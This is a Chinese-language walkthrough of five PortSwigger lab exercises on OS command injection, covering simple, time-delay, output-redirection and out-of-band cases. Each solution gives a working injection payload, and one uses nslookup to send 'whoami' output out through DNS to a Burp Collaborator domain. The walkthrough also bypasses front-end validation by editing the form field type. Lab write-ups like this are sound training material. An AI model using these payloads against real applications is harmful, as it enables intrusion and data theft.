Portswigger靶场OS命令注入实验

Portswigger靶场OS命令注入实验

简单OS命令注入

OS command injection, simple case

靶场

simple

说明

This lab contains an OS command injection vulnerability in the product stock checker.

The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.

To solve the lab, execute the whoami command to determine the name of the current user.

题解

进入商品页面，查询库存，发现post请求发送的参数为

storeId: 1

F12修改查询下拉菜单，select元素下有三个option元素，随便改一个option的value值，从1改为1&whoami

选择该修改过后的选项，发起查询库存请求，查看页面返回数据，显示出系统用户为peter-OIFshm，通过靶场

延时OS命令盲注

Blind OS command injection with time delays

靶场

blind-time-delays

说明

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.

To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.

题解

在提交反馈的邮箱处提交此代码，F12将input的type属性从email改为text绕过前端检查

&ping -c 10 localhost&

输出重定向的OS命令盲注

Blind OS command injection with output redirection

靶场

blind-output-redirection

说明

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:

/var/www/images/

To solve the lab, execute the whoami command and retrieve the output.

题解

将whoami命令输出重定向到可访问目录的文件

在提交反馈的邮箱处提交此代码，F12将input的type属性从email改为text绕过前端检查

& whoami > /var/www/images/whoami.txt &

访问该文件，随便请求一个商品图片，将文件名替换为重定向输出的文件名，获得用户名

/image?filename=whoami.txt

带外OS命令盲注

Blind OS command injection with out-of-band interaction

靶场

blind-out-of-band

说明

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

注意

To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.

题解

在提交反馈的邮箱处提交此代码，F12将input的type属性从email改为text绕过前端检查

BURP-COLLABORATOR-SUBDOMAIN替换为获取的域名服务器

& nslookup `whoami`.BURP-COLLABORATOR-SUBDOMAIN.burpcollaborator.net &

携带数据的带外OS命令盲注

Blind OS command injction with out-of-band data exfiltration

靶场

blind-out-of-band-data-exfiltration

说明

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.

注意

To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.

题解

同上题

在提交反馈的邮箱处提交此代码，F12将input的type属性从email改为text绕过前端检查

BURP-COLLABORATOR-SUBDOMAIN替换为获取的域名服务器

& nslookup `whoami`.BURP-COLLABORATOR-SUBDOMAIN.burpcollaborator.net &

获取用户名，提交通过